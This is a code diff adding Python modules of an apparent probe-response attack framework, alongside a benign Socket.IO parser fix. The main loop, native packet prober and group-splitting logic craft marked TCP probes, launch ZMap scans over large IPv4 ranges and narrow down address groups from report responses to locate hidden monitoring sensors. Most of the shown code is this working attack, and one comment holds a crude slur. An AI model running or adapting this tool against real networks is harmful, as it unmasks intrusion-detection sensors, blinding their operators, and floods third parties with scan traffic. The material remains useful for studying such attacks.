+		logger.debug("waiting some seconds for processess to settle")
+		time.sleep(1)
+
+	def _probe_native_cycler(self, cnt, sockethndl, groupqueue, ip_blacklist, mac_src_s, mac_dst_s, ip_src_s, marker_encoding):
+		"""
+		A native prober cycler to be used with processes.
+		"""
+		logger.debug("starting probing process No.%d" % cnt)
+		#basepacket = ethernet.Ethernet(dst_s=mac_dst_s, src_s=mac_src_s) +\
+		basepacket = ethernet.Ethernet(dst_s=mac_dst_s, src_s=mac_src_s) +\
+						ip.IP(src_s=ip_src_s, dst_s="1.2.3.4") +\
+						tcp.TCP(sport=50821)
+		#logger.debug("basepacket: %r" % basepacket)
+
+		send = sockethndl.send
+		ip_obj = basepacket.body_handler
+		ip_obj_bin = ip_obj.bin
+		tcp_obj = ip_obj.tcp
+		ether_bytes = basepacket.header_bytes
+		# initialize paket data
+		basepacket.bin()
+
+		queue_get = groupqueue.get
+
+		while True:
+			marker, addresses_bytes, is_cidr = queue_get()
+			# blacklists are only used for CIDR groups, single adresses were created by feedback IPs
+			#logger.debug("sending...")
+
+			for ip_address in addresses_bytes:
+				# single addresses or (cidr and not in blacklist)
+				if is_cidr and ip_address in ip_blacklist:
+					#logger.debug("not sending because in blacklist: addr=%r, CIDR=%r" % (ip_address, is_cidr))
+					continue
+				ip_obj.dst = ip_address
+				bytes_used = 0
+				#if cnt % 2000 == 0:
+				#	logger.debug("%d: placing marker: %r" % (self._group_storeindex, marker))
+				#	#time.sleep(0.2)
+				#cnt += 1
+				# this assumes that all marker types are fully used
+				if marker_encoding & ENCODE_PORT_DST == ENCODE_PORT_DST:
+					tcp_obj.dport = unpack_port(marker[: 2])[0]
+					bytes_used += 2
+				if marker_encoding & ENCODE_IP_SRC == ENCODE_IP_SRC:
+					ip_obj.src = marker[bytes_used: bytes_used + 4][0]
+					bytes_used += 4
+				if marker_encoding & ENCODE_PORT_SRC == ENCODE_PORT_SRC:
+					tcp_obj.sport = unpack_port(marker[bytes_used: bytes_used + 2])[0]
+				# TODO: use update_auto_fields=False for faster packet creation
+				send(ether_bytes + ip_obj_bin())
+				#send(ether_bytes + ip_obj_bin(update_auto_fields=False))
+
+	def _do_attack(self):
+		"""
+		Main attack loop to cycle through iterations until all monitors have been found.
+		"""
+		group_handler_obj = self._grouphandler
+
+		while self._running:
+			self._iterations.append([[0, 0], {}, 0, 0])
+			self._group_storeindex += 1
+			self._iterations[self._group_storeindex][0] = [time.time(), 0]
+			logger.info("new attack round! group store index: %d" % self._group_storeindex)
+
+			# after initial full scan
+			if self._group_storeindex >= 2:
+				logger.info("initiating subgrouping using group handler, top groups=%d" % len(self._iterations[self._group_storeindex - 1][1]))
+
+				if self.use_feedback_ips and self._group_storeindex == 2:
+					self._read_scanner_feedback_addresses()
+
+				# create subgroups from groups of last round
+				group_handler_obj.init_subgroup_creating(self._iterations[self._group_storeindex - 1][1],
+														self._iterations[self._group_storeindex][1],
+														self._blacklist_toptoipv4obj)
+
+			if group_handler_obj.state == group_handler.STATE_FINISHED:
+				logger.info("no groups left to scan, all monitors found")
+				self._iterations[self._group_storeindex][0][1] = time.time()
+				break
+			elif self._group_storeindex > 1:
+				logger.debug("letting group handler create some groups in advance..")
+				time.sleep(10)
+
+			self._report_fetcher.before_scanning()
+
+			# limit scanner feedback saving to first iteration
+			filename_output_csv = self._filename_scannerresponse_stage1 if self._group_storeindex == 1 else None
+
+			if self._group_storeindex == 2:
+				# scanner feedback should have been read by now, start native probe which need the blacklist
+				self._start_native_prober()
+
+			cnt = 0
+
+			# scan groups until handler has no groups left or we are initially scanning in stage 1
+			while group_handler_obj.state != group_handler.STATE_INACTIVE or self._group_storeindex == 1:
+				"""
+				# Iteration 0: [g_r00t]
+				# Iteration 1: [g1], [g2], ... <- auto-created by response (we did not create '+1'-groups)
+				# Iteration 2: [g1, +1][g2, +1] <- updated by group handler
+				"""
+				group = None
+
+				# this is skipped in the first iteration
+				if self._group_storeindex >= 2:
+					while group is None and group_handler_obj.state != group_handler.STATE_INACTIVE:
+						try:
+							# this blocks until a new group is available
+							# logger.debug("next group..")
+							group = group_handler_obj.get_next_subgroup()
+							#logger.debug("got a group from grouphandler, marker=%r, group=%r" %
+							#			 (group.marker_bytes, group))
+						except queue.Empty:
+							# loop over timeouts until we got a group or state of grouphandler changes
+							#logger.debug("Empty...")
+							time.sleep(1)
+							pass
+					# no groups left, break scan loop
+					if group is None:
+						break
+				else:
+					# initial scan? -> take initial group
+					group = self._iterations[0][1][self._root_group_name]
+
+				cnt += 1
+				#if cnt % 10000 == 0:
+				#	logger.debug("scan loop %d" % cnt)
+
+				if group.is_plus1:
+					# logger.debug("got a +1 group, not sending: %r" % group)
+					continue
+
+				# group size is too small: send probes via native implementation.
+				# using a ZMap would be too ineffective: Trade off between
+				# cost of creating a scan process (ZMap) vs. native probe costs
+				if (group.amount_addresses < 5000 or group.group_type == Group.GROUP_TYPE_SINGLE_ADDRESSES)\
+						and self._group_storeindex != 1:
+					if cnt % 100000 == 0:
+						logger.info("adding %d address for native probing, cnt=%d, queue grouphandler=%d" %
+									(group.amount_addresses, cnt, len(self._grouphandler._group_queue)))
+					#if self._group_storeindex >= 2:
+					#	logger.debug("group=%r, CIDR=%r" % (group, group.group_type == Group.GROUP_TYPE_CIDR))
+					self._groupqueue.put([group.marker_bytes,
+										group.addresses_single_bytes,
+										group.group_type == Group.GROUP_TYPE_CIDR])
+					#time.sleep(0.1)
+				else:
+					blacklist = self._filename_ip_blacklist
+
+					if self.use_feedback_ips and self._group_storeindex >= 2 and group.group_type == Group.GROUP_TYPE_CIDR:
+						# use extended blacklist file for CIDR (avoid scanning of single IPs which
+						# are already scanned by separate groups)
+						blacklist = self._filename_ip_blacklist_plus_feedback_ips
+
+					self._current_scans.clear()
+
+					#if group.amount_addresses > 499:
+					logger.debug("probing via zmap: max amount addresses=%r, group=%r, markervalue=%r" %
+									(group.amount_addresses, group, group.marker_value_int))
+					#	time.sleep(2)
+					scan_timeout = -1
+					# TODO: just for testing: stop scanning after x seconds
+
+					"""
+					if self._group_storeindex == 1:
+						scan_timeout = 60 * 60
+						#scan_timeout = 10
+						logger.debug("limiting scan to %d seconds" % scan_timeout)
+					"""
+					# group.markervalue: this is None in the first stage -> encode target address
+					# checksum: ZMap module got his own implementation which is needed by stage 0
+					# (create checksum of IP addresses from whole IPv4 address range)
+					scanner = scanner_wrapper.ZmapWrapper(
+								filename_output_csv=filename_output_csv,
+								filename_blacklist_target_ip=blacklist,
+								filename_whitelist_target_ip=self._filename_ip_whitelist,
+								# TODO: comment in to save scanner logs, disables scanner feedback!
+								#dirname_logs=self._dirname_scanner_logs,
+								rate_kbit_per_s=self.rate_kbit_per_s,
+								interface_name=self.interface_name,
+								mac_source=self.mac_source,
+								mac_gw=self.mac_gw,
+								marker_encoding=self.marker_encoding,
+								markervalue=group.marker_value_int,
+								markerbits_value=self.markerbits_value,
+								markerbits_checksum=self.markerbits_checksum,
+								disable_monitor=self.disable_monitor,
+								verbosity=3,
+								dir_zmap=self.base_dir_zmap,
+								target_addresses=group.addresses,
+								fast_mode=False,
+								scan_timeout=scan_timeout)
+					self._current_scans.append(scanner)
+					scanner.start()
+					self._current_scans.clear()
+
+					# we don't use the grouphandler so we have to break here
+					if self._group_storeindex == 1:
+						break
+
+			while self._grouphandler.queuesize > 0:
+				logger.debug("waiting until all queued native probes have been processed, queue: %d" % self._grouphandler.queuesize)
+				time.sleep(5)
+			while not self._groupqueue.empty():
+				logger.debug("waiting until group queue has been emptied")
+				time.sleep(5)
+
+			self._report_fetcher.after_scanning()
+			self._iterations[self._group_storeindex][0][1] = time.time()
+
+			logger.info("duration of round %d: %d seconds, groups (should be unchanged)=%d" % (
+								self._group_storeindex,
+								int(self._iterations[self._group_storeindex][0][1] - self._iterations[self._group_storeindex][0][0]),
+								len(self._iterations[self._group_storeindex][1])))
+
+			if self._group_storeindex >= 2:
+				if self.use_plus1:
+					group_handler_obj.update_plus1_subgroups(self._iterations[self._group_storeindex - 1][1])
+			self._iterations[self._group_storeindex][2] = len(self._iterations[self._group_storeindex][1])
+			self._iterations[self._group_storeindex][3] = sum([group.amount_addresses
+													for _,group in self._iterations[self._group_storeindex][1].items()])
+			group_handler_obj.remove_empty_groups(self._iterations[self._group_storeindex][1])
+		self.stop()
+
+	def get_amount_of_probes(self):
+		"""
+		Return the total amount of probes (or network packets) sent out.
+		"""
+		# - Single feedback addresses could have been scanned: remove redundant counted single addresses
+		# len([group1, group2]) -> len([singleaddr_group1, group1-singleaddr_group1, ...])
+		return self._grouphandler.addresses_total - len(self._blacklist)

+ 143 - 0
attack_framework/bugfix_socketio/parsers.py

@@ -0,0 +1,143 @@
+import json
+from collections import namedtuple
+
+from .symmetries import (
+    decode_string, encode_string, get_byte, get_character, parse_url)
+
+
+EngineIOSession = namedtuple('EngineIOSession', [
+    'id', 'ping_interval', 'ping_timeout', 'transport_upgrades'])
+SocketIOData = namedtuple('SocketIOData', ['path', 'ack_id', 'args'])
+
+
+def parse_host(host, port, resource):
+    if not host.startswith('http'):
+        host = 'http://' + host
+    url_pack = parse_url(host)
+    is_secure = url_pack.scheme == 'https'
+    port = port or url_pack.port or (443 if is_secure else 80)
+    url = '%s:%d%s/%s' % (url_pack.hostname, port, url_pack.path, resource)
+    return is_secure, url
+
+
+def parse_engineIO_session(engineIO_packet_data):
+    d = json.loads(decode_string(engineIO_packet_data))
+    return EngineIOSession(
+        id=d['sid'],
+        ping_interval=d['pingInterval'] / float(1000),
+        ping_timeout=d['pingTimeout'] / float(1000),
+        transport_upgrades=d['upgrades'])
+
+
+def encode_engineIO_content(engineIO_packets):
+    content = bytearray()
+    for packet_type, packet_data in engineIO_packets:
+        packet_text = format_packet_text(packet_type, packet_data)
+        content.extend(_make_packet_prefix(packet_text) + packet_text)
+    return content
+
+
+def decode_engineIO_content(content):
+    content_index = 0
+    content_length = len(content)
+    while content_index < content_length:
+        try:
+            content_index, packet_length = _read_packet_length(
+                content, content_index)
+        except IndexError:
+            break
+        content_index, packet_text = _read_packet_text(
+            content, content_index, packet_length)
+        engineIO_packet_type, engineIO_packet_data = parse_packet_text(
+            packet_text)
+        yield engineIO_packet_type, engineIO_packet_data
+
+
+def format_socketIO_packet_data(path=None, ack_id=None, args=None):
+    socketIO_packet_data = json.dumps(args, ensure_ascii=False) if args else ''
+    if ack_id is not None:
+        socketIO_packet_data = str(ack_id) + socketIO_packet_data
+    if path:
+        socketIO_packet_data = path + ',' + socketIO_packet_data
+    return socketIO_packet_data
+
+
+def parse_socketIO_packet_data(socketIO_packet_data):
+    # fix decoding if server is too stupid to use UTF-8 (decode_string will try UTF-8 anf latin-1)
+    try:
+        data = decode_string(socketIO_packet_data)
+    except Exception as ex:
+        print("Error on decoding data:")
+        print(socketIO_packet_data)
+        data = ""
+    if data.startswith('/'):
+        try:
+            path, data = data.split(',', 1)
+        except ValueError:
+            path = data
+            data = ''
+    else:
+        path = ''
+    try:
+        ack_id_string, data = data.split('[', 1)
+        data = '[' + data
+        ack_id = int(ack_id_string)
+    except (ValueError, IndexError):
+        ack_id = None
+    try:
+        args = json.loads(data)
+    except ValueError:
+        args = []
+    return SocketIOData(path=path, ack_id=ack_id, args=args)
+
+
+def format_packet_text(packet_type, packet_data):
+    return encode_string(str(packet_type) + packet_data)
+
+
+def parse_packet_text(packet_text):
+    packet_type = int(get_character(packet_text, 0))
+    packet_data = packet_text[1:]
+    return packet_type, packet_data
+
+
+def get_namespace_path(socketIO_packet_data):
+    if not socketIO_packet_data.startswith(b'/'):
+        return ''
+    # Loop incrementally in case there is binary data
+    parts = []
+    for i in range(len(socketIO_packet_data)):
+        character = get_character(socketIO_packet_data, i)
+        if ',' == character:
+            break
+        parts.append(character)
+    return ''.join(parts)
+
+
+def _make_packet_prefix(packet):
+    length_string = str(len(packet))
+    header_digits = bytearray([0])
+    for i in range(len(length_string)):
+        header_digits.append(ord(length_string[i]) - 48)
+    header_digits.append(255)
+    return header_digits
+
+
+def _read_packet_length(content, content_index):
+    while get_byte(content, content_index) != 0:
+        content_index += 1
+    content_index += 1
+    packet_length_string = ''
+    byte = get_byte(content, content_index)
+    while byte != 255:
+        packet_length_string += str(byte)
+        content_index += 1
+        byte = get_byte(content, content_index)
+    return content_index, int(packet_length_string)
+
+
+def _read_packet_text(content, content_index, packet_length):
+    while get_byte(content, content_index) == 255:
+        content_index += 1
+    packet_text = content[content_index:content_index + packet_length]
+    return content_index + packet_length, packet_text

+ 32 - 0
attack_framework/bugfix_socketio/symmetries.py

@@ -0,0 +1,32 @@
+import six
+try:
+    from urllib import urlencode as format_query
+except ImportError:
+    from urllib.parse import urlencode as format_query
+try:
+    from urlparse import urlparse as parse_url
+except ImportError:
+    from urllib.parse import urlparse as parse_url
+try:
+    memoryview = memoryview
+except NameError:
+    memoryview = buffer
+
+
+def get_character(x, index):
+    return chr(get_byte(x, index))
+
+
+def get_byte(x, index):
+    return six.indexbytes(x, index)
+
+
+def encode_string(x):
+    return x.encode('utf-8')
+
+
+def decode_string(x):
+    try:
+        return x.decode('utf-8')
+    except UnicodeDecodeError:
+        return x.decode('latin-1')

+ 252 - 0
attack_framework/group.py

@@ -0,0 +1,252 @@
+import logging
+import math
+
+logger = logging.getLogger("pra_framework")
+
+
+class Group(object):
+	"""
+	A Group represents a group of IP addresses regarding the PRA.
+	It's generally connected to a marker value for identification purposes.
+	A Group contains single addreses (group_type == Group.GROUP_TYPE_SINGLE_ADDRESSES)
+	OR address ranges (group_type == Group.GROUP_TYPE_CIDR)
+	"""
+	GROUP_TYPE_SINGLE_ADDRESSES = 0
+	GROUP_TYPE_CIDR = 1
+
+	def __init__(self,
+				ip_network_object=None,
+				ip_host_objects=None,
+				response_count=0):
+		"""
+		Given Parameters: The IPs this group is made of.
+		ip_network_bytes -- bytes like b"1234" to create this group
+		ip_host_objects -- IPs to be used to create this group
+		"""
+		self.ip_network = None
+		self.ip_hosts = None
+
+		if ip_network_object is not None:
+			self.ip_network = ip_network_object
+		else:
+			self.ip_hosts = ip_host_objects
+		# "+1"-groups won't get scanned, the amount of responses is derived implicitly
+		self.is_plus1 = False
+		# store "+1"-Subgroup for faster access (marker bytes OR group itself)
+		self.plus1_subgroup = None
+		# logger.debug("group network/addresses: %r/%r" % (self.ip_network, self.ip_hosts))
+		# full marker as bytes
+		self.marker_bytes = None
+		self.marker_value_int = None
+		# how many times the group is counted in the report
+		self.response_count = response_count
+		# needed to create additional blacklists for other groups which do not need
+		# to scan this addresses again (already placed in separate group)
+		self.top_group = None
+		self.subgroups = set()
+		# indicates that this subgroup has response count unequal
+		# to the sum of responses of all its subgroups
+		# positive value: top group has more responses than sum of all subgroups, negative value: less ...)
+		# TODO: activate if needed (deactivated to save memory)
+		#self.response_discrepancy = 0
+
+	def _get_grouptype(self):
+		return Group.GROUP_TYPE_CIDR if self.ip_network is not None else Group.GROUP_TYPE_SINGLE_ADDRESSES
+
+	group_type = property(_get_grouptype)
+
+	def _get_amount_addresses(self):
+		return self.ip_network.num_addresses if self.group_type == Group.GROUP_TYPE_CIDR else len(self.ip_hosts)
+
+	amount_addresses = property(_get_amount_addresses)
+
+	def add_subgroup(self, group):
+		group.top_group = self
+		#group.top_group_markervalue_bytes = self.markervalue_bytes
+		self.subgroups.add(group)
+
+	def create_subgroups(self, amount_subgroups, ipv4_addresses=[], use_plus1=False):
+		"""
+		Create amount subgroups based on amount_subgroups and response counts.
+		amount_subgroups -- amount of subgroups to create, this includes the +1 group
+			e.g. amount_subgroups = 4 = subgroups + "+1"
+		ipv4_addresses -- list of single IP addresses as IP objects to be added as dedicated group.
+		use_plus1 -- define last subgroup as +1 group
+		return -- created subgroups as list
+		"""
+		subgroups = []
+
+		if self.response_count >= self.amount_addresses:
+			if self.response_count > self.amount_addresses:
+				logger.warning("got more responses than amount addresses, too much noise?"
+								" responses/# addresses = %d/%d" % (self.response_count, self.amount_addresses))
+			return subgroups
+		# check if this is a single address group (CIDR prefix is 32 or just 1 single address)
+		if self.amount_addresses <= 1:
+			return subgroups
+
+		if self.group_type == Group.GROUP_TYPE_SINGLE_ADDRESSES:
+			single_addr_amount = len(self.ip_hosts)
+			"""
+			logger.debug("subgrouping single addresses: addresses/target subgroups = %d/%d" %
+						(single_addr_amount, amount_subgroups))
+			"""
+			if single_addr_amount == 0:
+				logger.warning("no host for subgrouping!")
+
+			# split by amount of adresses
+			groupsize_single = math.floor(single_addr_amount / amount_subgroups)
+			# at minimum 1 group
+			groupsize_single = max(1, groupsize_single)
+
+			for i in range(0, single_addr_amount, groupsize_single):
+				# not enough room for more groups, add all remaining addresses
+				if len(subgroups) + 1 >= amount_subgroups:
+					subgroup = Group(ip_host_objects=self.ip_hosts[i:])
+					subgroups.append(subgroup)
+					break
+				else:
+					sub_ips = self.ip_hosts[i: i + groupsize_single]
+					# this should not happen
+					if len(sub_ips) != 0:
+						subgroup = Group(ip_host_objects=sub_ips)
+						subgroups.append(subgroup)
+					else:
+						break
+
+		elif self.group_type == Group.GROUP_TYPE_CIDR:
+			subgroups_single_addresses = 0
+			#logger.debug("picking IPv4 addresses which belong to this groups (searching through: %d)" % len(ip_host_objects))
+			single_addresses_for_regrouping = ipv4_addresses
+			# amount of single addresses to be re-groupted
+			single_addr_amount = len(single_addresses_for_regrouping)
+
+			if single_addr_amount > 0:
+				if len(single_addresses_for_regrouping) > 0:
+					#logger.debug("re-grouping %d single addresses for nw %r" % (single_addr_amount, self.ip_network))
+					#for single_addr in single_addresses_for_regrouping:
+					#	logger.debug("%r" % single_addr)
+					# calculate amount of subgroups for single addresses:
+					# (amount of single addreses / total group address space) * amount of groups
+					subgroups_single_addresses = math.floor((single_addr_amount / self.ip_network.num_addresses) *
+													amount_subgroups)
+					# at minimum 1 group
+					subgroups_single_addresses = max(1, subgroups_single_addresses)
+					# not more groups than single addresses
+					subgroups_single_addresses = min(single_addr_amount, subgroups_single_addresses)
+					groupsize_single = math.floor(single_addr_amount / subgroups_single_addresses)
+					"""
+					logger.debug("creating single addresses groups,"
+								"addr total=%d, groups total=%d, group size=: %d/%d/%d" %
+								(single_addr_amount,
+								subgroups_single_addresses,
+								groupsize_single))
+					"""
+					for i in range(0, single_addr_amount, groupsize_single):
+						if len(subgroups) + 1 >= subgroups_single_addresses:
+							group = Group(ip_host_objects=single_addresses_for_regrouping[i:])
+							#logger.debug("adding single addresses group: %r" % group)
+							subgroups.append(group)
+							break
+						else:
+							addresses = single_addresses_for_regrouping[i: i + groupsize_single]
+
+							if len(addresses) != 0:
+								group = Group(ip_host_objects=addresses)
+								#logger.debug("adding single addresses group: %r" % group)
+								subgroups.append(group)
+							else:
+								# no more groups to split up
+								break
+
+			# round to next lower integer with 2**x <= (amount of groups for cidr)
+			# Example: 16/5 (ip/groups) = 5 -> 2**_log_2(5)_ = 4 top groups [4,4,4,4]
+			# (which are splittet later on) -> [4,4,4,2,2]
+			cidr_bits_plus = math.floor(math.log(
+									amount_subgroups - subgroups_single_addresses,
+									2))
+			# not more CIDR bits than available
+			cidr_bits_plus = min(32 - self.ip_network.prefixlen, cidr_bits_plus)
+			"""
+			logger.debug("current prefix=%d, CIDR bits plus=%d, amount subgroups=%d, single addresses=%d" %
+						(self.ip_network.prefixlen, cidr_bits_plus, amount_subgroups, subgroups_single_addresses))
+			"""
+			# create subnets: e.g. 1.2.3.0/24 -> CIDR+1 -> 1.2.3.0/25, 1.2.3.128/25
+			cidr_nw = self.ip_network.subnets(prefixlen_diff=cidr_bits_plus)
+			cidr_nw_len_at_start = len(cidr_nw)
+			# amount of times we reached CIDR /32
+			splitfail_cnt = 0
+			# logger.debug("re-splitting groups for CIDR, initial groupsize/target amount of groups/CIDR bits +x: %d/%d/%d" %
+			#			(cidr_nw_len_at_start, amount_groups_for_cidr, cidr_bits_plus))
+			subgroup_len = len(subgroups)
+
+			while len(cidr_nw) + subgroup_len < amount_subgroups:
+				# split subgroups until we have enough of them
+				# [A,B,C,D] -> split A by 1 bit -> [B,C,D,a,a] -> split B by 1 bit -> [C,D,a,a,b,b] ...
+				group_to_split = cidr_nw[0]
+				del cidr_nw[0]
+
+				if group_to_split.prefixlen == 32:
+					# nothing to split: re-append to the end
+					cidr_nw.append(group_to_split)
+					splitfail_cnt += 1
+					#logger.debug("can't create subnets anymore: /32 reached for %r" % group_to_split)
+					if splitfail_cnt > len(cidr_nw):
+						# logger.warning("too many split fails: single addresses reached?")
+						break
+				else:
+					subnets = group_to_split.subnets(prefixlen_diff=1)
+					if subgroup_len + len(cidr_nw) + len(subnets) > amount_subgroups:
+						logger.debug("!!! stopping CIDR subgrouping: split would increase max number")
+						cidr_nw.append(group_to_split)
+						break
+					#logger.debug("new subgroups: %d" % len(subnets))
+					# append subnet to the end and try next
+					cidr_nw.extend(subnets)
+
+			if cidr_nw_len_at_start == len(cidr_nw):
+				# logger.debug("no CIDR groups have been re-splitted (perhaps there were enough (2**x)): %d" %
+				#			cidr_nw_len_at_start)
+				pass
+
+			# then add CIDR based groups
+			for nw in cidr_nw:
+				#logger.debug("g5: adding sub: %r" % nw)
+				group = Group(ip_network_object=nw)
+				subgroups.append(group)
+
+		if use_plus1 and len(subgroups) > 1:
+			subgroups[-1].is_plus1 = True
+		"""
+		if len(subgroups) < 600:
+			for g in subgroups:
+				logger.debug("%r" % g)
+		"""
+		# state should now be: [single address groups]+[CIDR groups]
+		return subgroups
+
+	def _addr_get(self):
+		addr = []
+		if self.ip_network is not None:
+			addr.append(self.ip_network.compressed)
+		else:
+			addr.extend([host.compressed for host in self.ip_hosts])
+		return addr
+	# return all addresses as list of strings (mixed CIDR and single notation)
+	addresses = property(_addr_get)
+
+	def _addr_get_single_bytes(self):
+		if self.group_type == Group.GROUP_TYPE_CIDR:
+			return self.ip_network.hosts
+		else:
+			return [host.packed for host in self.ip_hosts]
+	# return all addresses als list of bytes (only single non-CIDR notation)
+	addresses_single_bytes = property(_addr_get_single_bytes)
+
+	def __repr__(self):
+		if self.group_type == Group.GROUP_TYPE_CIDR:
+			# "1.2.3.4/x"
+			return self.ip_network.compressed
+		else:
+			# "1.2.3.4 1.2.3.5 ..."
+			return " ".join([host.compressed for host in self.ip_hosts])

+ 373 - 0
attack_framework/group_handler.py

@@ -0,0 +1,373 @@
+import logging
+import time
+import math
+import threading
+import struct
+from queue import Queue, Empty
+from collections import deque
+
+logger = logging.getLogger("pra_framework")
+pack_byte = struct.Struct(">B").pack
+pack_4bytes = struct.Struct(">I").pack
+
+STATE_INACTIVE = 0
+STATE_SUBGROUPING = 1
+STATE_READING_SAVED_GROUPS = 2
+STATE_FINISHED = 4
+
+class GroupHandler(object):
+	"""
+	Creates new groups asynchronously.
+	Lifecycle:
+	init_subgroup_creating() -> while group_handler.state == STATE_SUBGROUPING:  get_next_subgroup()
+	-queue empty-> init_reading() -> while group_handler.state == STATE_SUBGROUPING: get_next_saved_subgroup()
+	-> STATE_INACTIVE
+	"""
+	def __init__(self, marker_value_amount,
+						use_plus1,
+						create_marker_callback):
+		self._marker_value_amount = marker_value_amount
+		self._state = STATE_INACTIVE
+		self._use_plus1 = use_plus1
+		self._create_marker_callback = create_marker_callback
+		#self._group_queue = Queue(500000)
+		self._group_queue_maxlen = 1000000
+		self._group_queue = deque(maxlen=self._group_queue_maxlen)
+		self._subgroup_create_thread = None
+		self._identified_groups = []
+		self._subgrouping_finished = True
+		self._iteration = 0
+		self._feedback_addresses = None
+		self._addresscount = 0
+
+	def _get_state(self):
+		return self._state
+	# One of STATE_INACTIVE, STATE_FINISHED, STATE_SUBGROUPING
+	state = property(_get_state)
+
+	def _get_queuesize(self):
+		return len(self._group_queue)
+	queuesize = property(_get_queuesize)
+
+	def _get_identified_groups(self):
+		return self._identified_groups
+	identified_groups = property(_get_identified_groups)
+
+	def _get_addresses_total(self):
+		return self._addresscount
+
+	# total amount of created addresses for probing (single addresses in group intersections not removed)
+	addresses_total = property(_get_addresses_total)
+
+	def init_subgroup_creating(self, top_groups, subgroup_storage, feedback_addresses):
+		"""
+		Initiate subgroup creating. If no more groups are left for subgrouping, then
+		all monitor IP addresses are found and the attack is finished.
+
+		top_groups -- groups to resplit
+		subgroup_storage -- dict for storing groups
+		feedback_addresses -- list of IPv4Address objects for re-clustering
+		"""
+		logger.debug("group creating initiated, queue length (should be 0)=%d" % self.queuesize)
+		if self._state != STATE_INACTIVE:
+			logger.warn("state not inactive, have been all groups read? queue=%d" %
+						len(self._group_queue))
+			return
+		self._state = STATE_SUBGROUPING
+		self._feedback_addresses = feedback_addresses
+		self._iteration += 1
+
+		# marker = [group, amount_subgroups]
+		groups_to_resplit = {}
+		# responses of NON identified groups, needed to distribute marker
+		responses_total = 0
+		# stop if we got x% non idenfitied addresses left.
+		# this assumes we got low noise, else we stop too early
+		addresses_fromnonidentified_total = 0
+
+		# Count total amount of responses from report.
+		# In iteration 1 groups have been created by response at iteration 0
+		# Don't count identified groups.
+		for marker, group in top_groups.items():
+			if group.response_count < group.amount_addresses:
+				responses_total += group.response_count
+				addresses_fromnonidentified_total += group.amount_addresses
+				# We only take groups non-identified groups (response count < addresses per group) and
+				# having at minimum 1 response
+				if group.response_count != 0:
+					#logger.debug("group to be resplittet: %r" % group)
+					groups_to_resplit[marker] = [group, 0]
+			elif group.response_count >= group.amount_addresses:
+				# BE WARNED: no responses to other groups could also mean: missed responses because
+				# of network errors etc. In this case the "+1" group is counted as identified
+				"""
+				logger.info("group was identified: %r, response count/total addresses = %d/%d" %
+							(group, group.response_count, group.amount_addresses))
+				"""
+				"""
+				def show_hierarchy(group):
+					gs = [group]
+					_top_group = group.top_group
+					while _top_group is not None:
+						gs.append(_top_group)
+						_top_group = _top_group.top_group
+					p = ["%r" % g for g in gs]
+					print(" -> ".join(p))
+				show_hierarchy(group)
+				"""
+				self._identified_groups.append([group, int(time.time()), self._iteration])
+
+		# stop if nearly all nose have been identified. This avoids endless attack loops
+		# because of disappearing monitor nodes
+		# add one to avoid division by zero
+		if responses_total / (addresses_fromnonidentified_total + 1) > 0.99:
+			logger.info("fraction of identified monitors reached: responses/addresses (non identified) = %d/%d = %f" %
+						(responses_total, addresses_fromnonidentified_total, (responses_total / addresses_fromnonidentified_total)))
+			self._state = STATE_FINISHED
+			return
+		elif len(groups_to_resplit) == 0:
+			logger.info("no groups left to create subgroups from, identified groups=%d" % len(self._identified_groups))
+			self._state = STATE_FINISHED
+			return
+
+		self._subgroup_create_thread = threading.Thread(target=self._subgroups_create_cycler,
+														args=(groups_to_resplit,
+														subgroup_storage,
+														responses_total))
+		logger.debug("starting subgroup creating using %d top groups" % len(groups_to_resplit))
+		self._subgroup_create_thread.start()
+
+	def get_next_subgroup(self):
+		"""
+		return -- next group or raises Empty exceptions if no groups are currently available.
+			The scanner state switched to STATE_INACTIVE if all no groups are left AND no more
+			groups can be created (subgroup creating finished).
+		"""
+		try:
+			return self._group_queue.popleft()
+		except IndexError:
+			# subgrouping finished and queue is empty: change state to inactive
+			if self._subgrouping_finished:
+				logger.debug("!!! switching to STATE_INACTIVE")
+				self._state = STATE_INACTIVE
+			raise Empty
+
+	def _subgroups_create_cycler(self, groups_to_resplit, subgroup_storage, responses_total):
+		"""
+		Create news ubgroups incrementally.
+
+		groups_to_resplit -- list containing groups to resplit and count of subgroups (init to 0)  [[Group(), 0], ...]
+		subgroup_storage -- dictionary to store new subgroups
+		responses_total -- sum of all responses for all subgroups
+		"""
+		# marker (amount of subgroups) are distributed based on the amount of responses from the first stage:
+		# amount per subgroups = (responses per top-group)/(total responses) * (amount marker)
+		# more feedpack = more marker
+		logger.debug("setting new marker frequencies per group")
+		self._subgrouping_finished = False
+
+		for marker in groups_to_resplit.keys():
+			group = groups_to_resplit[marker][0]
+			groups_to_resplit[marker][1] = math.floor((group.response_count / responses_total) * self._marker_value_amount)
+			"""
+			logger.debug("group=%r: response count=%d, target split=%d, responses total=%d" % (group,
+																					group.response_count,
+																					groups_to_resplit[marker][1],
+																					responses_total))
+			"""
+			# create one more subgroup which we don't use marker for
+			if self._use_plus1:
+				groups_to_resplit[marker][1] += 1
+
+		# at minimum 2 markers for every group, robin hood principle: take from the rich/give it to the bitch
+		logger.debug("re-distributing marker frequencies (min 2 per group)")
+		self._redistribute_marker_frequencies(groups_to_resplit)
+		"""
+		logger.info("total responses/groups for resplit/marker values: %d/%d/%d" % (
+														responses_total,
+														len(groups_to_resplit),
+														self._marker_value_amount
+														)
+					)
+		"""
+		"""
+		if len(groups_to_resplit) < 20:
+			logger.debug("groups to resplit:")
+
+			for marker, group_freq in groups_to_resplit.items():
+				logger.debug("%s -> %r (max subgroups to be created: %d)" % (marker, group_freq[0], group_freq[1]))
+		"""
+		markervalue_int = 0
+		# sanity check for already stored marker
+		plus1_cnt = 0
+		plus1_cnt_connected = 0
+		subgroup_cnt = 0
+
+		if self._iteration == 1 and len(self._feedback_addresses) != 0:
+			logger.debug("will use feedback addresses for subgrouping")
+		group_miss = 0
+
+		# create subgroups vor every top group in current stage
+		for marker, group_freq in groups_to_resplit.items():
+			# skip group as we don't have enough marker values, try in next iteration
+			if group_freq[1] < 2:
+				# set to 1 to avoid out-filtering in next iteration
+				group_freq[0].response_count = 1
+				subgroup_storage["GROUP_MISS_%d" % group_miss] = group_freq[0]
+				group_miss += 1
+				continue
+
+			feedback_addr = []
+
+			if self._iteration == 1:
+				# marker is actually the target IP address in the first iteration
+				try:
+					feedback_addr = self._feedback_addresses[marker]
+				except KeyError:
+					# no scanner feedback address for top group, this can happen sometimes:
+					# monitor not sending anything on probes on scanner level
+					#logger.warning("could not find feedback addresses for top group %r" % group_freq)
+					pass
+
+			# split up to group_freq[1] amount of subgroups (stop if single addresses are reached)
+			# "+1" subgroup are automatically created by create_subgroups
